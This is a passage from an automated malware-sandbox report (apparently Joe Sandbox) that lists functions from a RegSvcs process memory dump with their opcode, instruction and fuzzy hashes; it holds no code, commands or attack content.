                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2332f6068ba84981fb915f087adb019cb5df7a462cd4de3ec47f0541a5374e5c
                                                                                                                              • Instruction ID: d67ffa8dfd8854f41d55eb65ac1f9f8a573581fe422dcd47c6bcf626a0bb27a6
                                                                                                                              • Opcode Fuzzy Hash: 2332f6068ba84981fb915f087adb019cb5df7a462cd4de3ec47f0541a5374e5c
                                                                                                                              • Instruction Fuzzy Hash: 3A90023160580112914071584CC45864009A7F4301B55C012E0425555CCB248A565771
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A4650 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 28af359866460ac474421fa3cb7f8b64128b2ac99223464a2d464169454e1b95
                                                                                                                              • Instruction ID: 6368fdfee4bc5d4bf4fb20d53742efdb37d9cb04b396660b9ef17074947bacef
                                                                                                                              • Opcode Fuzzy Hash: 28af359866460ac474421fa3cb7f8b64128b2ac99223464a2d464169454e1b95
                                                                                                                              • Instruction Fuzzy Hash: E490026160150142414071584C444466009A7F5301395C116A0555561CC72889559779
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a158cf215fcc69ea7955b47715b1bed10aba7ae87dbb442e803d301b56907fde
                                                                                                                              • Instruction ID: d4dcabfcb4deb37e3ec7fafd1fbd9009c4c01ef855ec7457684bc2a90452686b
                                                                                                                              • Opcode Fuzzy Hash: a158cf215fcc69ea7955b47715b1bed10aba7ae87dbb442e803d301b56907fde
                                                                                                                              • Instruction Fuzzy Hash: D590023120544942D14071584844A86001997E4305F55C012A0065695DD7358E55BB71
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ab291a0cb142dd9cf5f1902c3c34521872a0721bd99a00301a9bd6d557cc78e4
                                                                                                                              • Instruction ID: 527cfe719914b536bad162d812db3c2a6aa4437425e4f7f39812f8131e50b723
                                                                                                                              • Opcode Fuzzy Hash: ab291a0cb142dd9cf5f1902c3c34521872a0721bd99a00301a9bd6d557cc78e4
                                                                                                                              • Instruction Fuzzy Hash: F490023120140902D1807158484468A000997E5301F95C016A0026655DCB258B597BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1b7e0b78305074638ea25549d8d75033566727d002710ce1ea0272c0933f6697
                                                                                                                              • Instruction ID: 3a9dc3b72bc4b10c9f69467f31dca94c82d52e499fc73dd7282d6fba5e06967e
                                                                                                                              • Opcode Fuzzy Hash: 1b7e0b78305074638ea25549d8d75033566727d002710ce1ea0272c0933f6697
                                                                                                                              • Instruction Fuzzy Hash: FA90023120140902D10471584C446C6000997E4301F55C012A6025656ED77589917631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a294543268db909fea9c659124219223830bc3fd832f68d0b783cf94dbf5883
                                                                                                                              • Instruction ID: 9b9fe3da5e6afe599706d70c652b4cb12ac064f475b6be101a1ccdf63cd0c931
                                                                                                                              • Opcode Fuzzy Hash: 2a294543268db909fea9c659124219223830bc3fd832f68d0b783cf94dbf5883
                                                                                                                              • Instruction Fuzzy Hash: 9890023160540902D15071584854786000997E4301F55C012A0025655DC7658B557BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3702911b316ac6be3cb9c58eb77110c2b294f13867de2a8dd3b3f3a52cf4d898
                                                                                                                              • Instruction ID: ef1594cdc0029d5175007cd9cfeaf8e6e129b01a3e3a4db3733c2bbaf449df62
                                                                                                                              • Opcode Fuzzy Hash: 3702911b316ac6be3cb9c58eb77110c2b294f13867de2a8dd3b3f3a52cf4d898
                                                                                                                              • Instruction Fuzzy Hash: 59900225211401030105B5580B44547004A97E9351355C022F1016551CD73189615631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f3f9f6e6ebe3f96c10eb5f41ad48981364115ff36b1e20bc81817868ca63aea1
                                                                                                                              • Instruction ID: 1c98c9eb8e0952ace9d4723098bdd5c9e634f273563195ac448fc83143f9ae36
                                                                                                                              • Opcode Fuzzy Hash: f3f9f6e6ebe3f96c10eb5f41ad48981364115ff36b1e20bc81817868ca63aea1
                                                                                                                              • Instruction Fuzzy Hash: 00900225221401020145B5580A4454B0449A7EA351395C016F1417591CC73189655731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 623ea991c5f93ce60aa70185ccfd9991167079209f7964b262a7fbf5968e92ff
                                                                                                                              • Instruction ID: bdc437eb78cc0bfae9a3405a537f0750a95a58de04202a52ede27aeb44e4a9fd
                                                                                                                              • Opcode Fuzzy Hash: 623ea991c5f93ce60aa70185ccfd9991167079209f7964b262a7fbf5968e92ff
                                                                                                                              • Instruction Fuzzy Hash: 8F9002A1201541924500B2588844B4A450997F4201B55C017E1055561CC63589519635
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 54c484ffd3827b870396aaf9cf4b6d37396e0ba1f18ca615f6990e52614d7169
                                                                                                                              • Instruction ID: a861611995e416999033f51c7465c88bf1a172c6b122e174d2058bed0959c215
                                                                                                                              • Opcode Fuzzy Hash: 54c484ffd3827b870396aaf9cf4b6d37396e0ba1f18ca615f6990e52614d7169
                                                                                                                              • Instruction Fuzzy Hash: CE90022120544542D10075585848A46000997E4205F55D012A1065596DC7358951A631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4f352caba151455307541de580561fecc0afdbfa80e76477a8d9629da81c653
                                                                                                                              • Instruction ID: ebf8b2fe2f466b96026e320bfe7601e215b1961f583f9fd80b9a031ad0500390
                                                                                                                              • Opcode Fuzzy Hash: a4f352caba151455307541de580561fecc0afdbfa80e76477a8d9629da81c653
                                                                                                                              • Instruction Fuzzy Hash: 3990022921340102D1807158584864A000997E5202F95D416A0016559CCA2589695731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ee68877f0e7264cb246db3d39a66760a303f4eafc39e3378df90ddc1071ef840
                                                                                                                              • Instruction ID: c731b0bc8c5551bf46a8286fac676865e2b761cdb6eb10602a8b6047635b5d1f
                                                                                                                              • Opcode Fuzzy Hash: ee68877f0e7264cb246db3d39a66760a303f4eafc39e3378df90ddc1071ef840
                                                                                                                              • Instruction Fuzzy Hash: 0390022130140103D140715858586464009E7F5301F55D012E0415555CDA2589565732
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0acee9f8c14b54fbea05ccd2171e030ada878b20139c22a60169cdfe177f4397
                                                                                                                              • Instruction ID: 480a28c9a13dafba16e52dae4d6fcff38d0329e9bca8f6defb6b23d2a0273db0
                                                                                                                              • Opcode Fuzzy Hash: 0acee9f8c14b54fbea05ccd2171e030ada878b20139c22a60169cdfe177f4397
                                                                                                                              • Instruction Fuzzy Hash: 5C900221242442525545B1584844547400AA7F4241795C013A1415951CC6369956DB31
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 38164e4c68e8035382a9f09934f0bd3d8a889b2a0740e5ee54e77126ed897915
                                                                                                                              • Instruction ID: 381819a986ed9761c056025e4c448f322481f952c244c599b9a7dfdbf2985fb8
                                                                                                                              • Opcode Fuzzy Hash: 38164e4c68e8035382a9f09934f0bd3d8a889b2a0740e5ee54e77126ed897915
                                                                                                                              • Instruction Fuzzy Hash: 8790023124140502D14171584844646000DA7E4241F95C013A0425555EC7658B56AF71
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f3dd717e2b79f9411f113ccb0353a2959120e1cb86c1e13b72994926ea425474
                                                                                                                              • Instruction ID: aff886cf0bee069afbe45275feefb6b3ff82c929a44f0c4d92872f8d898b54d5
                                                                                                                              • Opcode Fuzzy Hash: f3dd717e2b79f9411f113ccb0353a2959120e1cb86c1e13b72994926ea425474
                                                                                                                              • Instruction Fuzzy Hash: 0990023120140942D10071584844B86000997F4301F55C017A0125655DC725C9517A31
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ba4960ddd6132b69deea7c67947e5799540aee667984568b4fa98ed8d1a2f5a
                                                                                                                              • Instruction ID: cce2b56048e7b0bd56789148e14747f0826623143e7b2d6584ee1828996cd6d7
                                                                                                                              • Opcode Fuzzy Hash: 6ba4960ddd6132b69deea7c67947e5799540aee667984568b4fa98ed8d1a2f5a
                                                                                                                              • Instruction Fuzzy Hash: 8B90022160540502D14071585858746001997E4201F55D012A0025555DC7698B556BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 071399d398c8702bcbfa2baaf49fabed2317e1c45a8ae7ffcfc6dbbd630279da
                                                                                                                              • Instruction ID: 2bbb340c4f6f2c71fb2f0a4150b181b51dc280ec45cbb0c1663281035010610b
                                                                                                                              • Opcode Fuzzy Hash: 071399d398c8702bcbfa2baaf49fabed2317e1c45a8ae7ffcfc6dbbd630279da
                                                                                                                              • Instruction Fuzzy Hash: 1C90023120140503D10071585948747000997E4201F55D412A0425559DD76689516631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e53db23bde53ea7da876c6941f571507578924bcfb9cb2dbc30aed66a86de887
                                                                                                                              • Instruction ID: 7610f1d7589a1ba66440c221634064c10a4b19fd9fac623d8daed7a05d514f65
                                                                                                                              • Opcode Fuzzy Hash: e53db23bde53ea7da876c6941f571507578924bcfb9cb2dbc30aed66a86de887
                                                                                                                              • Instruction Fuzzy Hash: F090023120140502D10075985848686000997F4301F55D012A5025556EC77589916631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a526437b396500048a1de25e7865c2239f2442a6cb25e1cada6abf083acf894
                                                                                                                              • Instruction ID: ca96db129a8355f42d2a49238ac63ce4dd00938efcf8cd9878414cee6f6bdac5
                                                                                                                              • Opcode Fuzzy Hash: 5a526437b396500048a1de25e7865c2239f2442a6cb25e1cada6abf083acf894
                                                                                                                              • Instruction Fuzzy Hash: FD90047131140143D104715C4C44747004DD7F5301F55C013F3155555CC73DCD715735
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a76cc582187bb239fdeb9773de17f81790cd769ba85053a27e66169fb4d3ce9
                                                                                                                              • Instruction ID: 6420d27a446303430a478b207be85fd67bb7a40fd51a471b56dcdf680784bcfe
                                                                                                                              • Opcode Fuzzy Hash: 2a76cc582187bb239fdeb9773de17f81790cd769ba85053a27e66169fb4d3ce9
                                                                                                                              • Instruction Fuzzy Hash: F590026134140542D10071584854B460009D7F5301F55C016E1065555DC729CD526636
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3cc2bb3af2091944f4fc71a182b09e936aa353381c230840843051c883f70194
                                                                                                                              • Instruction ID: 56a7c3ecc30781737508aafa2c4a385406e72324ef5e3e4ea591709c924600aa
                                                                                                                              • Opcode Fuzzy Hash: 3cc2bb3af2091944f4fc71a182b09e936aa353381c230840843051c883f70194
                                                                                                                              • Instruction Fuzzy Hash: 4B900221211C0142D20075684C54B47000997E4303F55C116A0155555CCA2589615A31
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c370016b1767ade6d09900ac145824f8b40c15450b46568ed781b408259a8fe8
                                                                                                                              • Instruction ID: e5dfaaad0a0072895b346f47a2a6714b593562faeea347b5ecd2db8d3d9f63a6
                                                                                                                              • Opcode Fuzzy Hash: c370016b1767ade6d09900ac145824f8b40c15450b46568ed781b408259a8fe8
                                                                                                                              • Instruction Fuzzy Hash: 2A90023120180502D10071584C5474B000997E4302F55C012A1165556DC73589516A71
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0405526221011c7ade5f85e999d687b02499ea8206503fd51fdfc950d82554b7
                                                                                                                              • Instruction ID: aa8702a5c1b511f3a7ceb909fc1c9ead2853ba7d97c10de88e2e73f8d6fdd1b5
                                                                                                                              • Opcode Fuzzy Hash: 0405526221011c7ade5f85e999d687b02499ea8206503fd51fdfc950d82554b7
                                                                                                                              • Instruction Fuzzy Hash: 9690023120180502D10071584C48787000997E4302F55C012A5165556EC775C9916A31
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7da417244985e06fc9c4e45df50961c1c0e5a02998f7f9096d40d211ea9002fd
                                                                                                                              • Instruction ID: 42dd875b1130f38800c204300d41046b40167787654adc23ea5894d81b07597f
                                                                                                                              • Opcode Fuzzy Hash: 7da417244985e06fc9c4e45df50961c1c0e5a02998f7f9096d40d211ea9002fd
                                                                                                                              • Instruction Fuzzy Hash: 7E90022160140142414071688C849464009BBF5211755C122A0999551DC66989655B75
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 74f213d49adae602e346627f05ab6b2b859d61293176ee2bbe2aa46519b94289
                                                                                                                              • Instruction ID: 17714654a561aefb24215060ef7fe3973b3d7dbcbd4e76d1030b715fa6665446
                                                                                                                              • Opcode Fuzzy Hash: 74f213d49adae602e346627f05ab6b2b859d61293176ee2bbe2aa46519b94289
                                                                                                                              • Instruction Fuzzy Hash: D790022130140502D10271584854646000DD7E5345F95C013E1425556DC7358A53A632
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c0670824a698b5d87de69b03750ea503fa0066b9d4408e66fc7cfb535d155057
                                                                                                                              • Instruction ID: 99ca016d017121cca0030e0fa2d4af4c0a19e47a0059684adc59a9e8e512c020
                                                                                                                              • Opcode Fuzzy Hash: c0670824a698b5d87de69b03750ea503fa0066b9d4408e66fc7cfb535d155057
                                                                                                                              • Instruction Fuzzy Hash: C390026120180503D14075584C44647000997E4302F55C012A2065556ECB398D516635
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 897893fe494610374441ef728bfd4e8519e9b9c2d2c5fdb581dd0f709a869a0f
                                                                                                                              • Instruction ID: 388da0fe915abba47e3b3910c3f6187c7e0f55c71ec8d69d02fb82637fd4e42c
                                                                                                                              • Opcode Fuzzy Hash: 897893fe494610374441ef728bfd4e8519e9b9c2d2c5fdb581dd0f709a869a0f
                                                                                                                              • Instruction Fuzzy Hash: 8690022160140602D10171584844656000E97E4241F95C023A1025556ECB358A92A631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f2982cc54c820de80a7d80db0399477d896b7c71a296c2c6ee151dacc6875e09
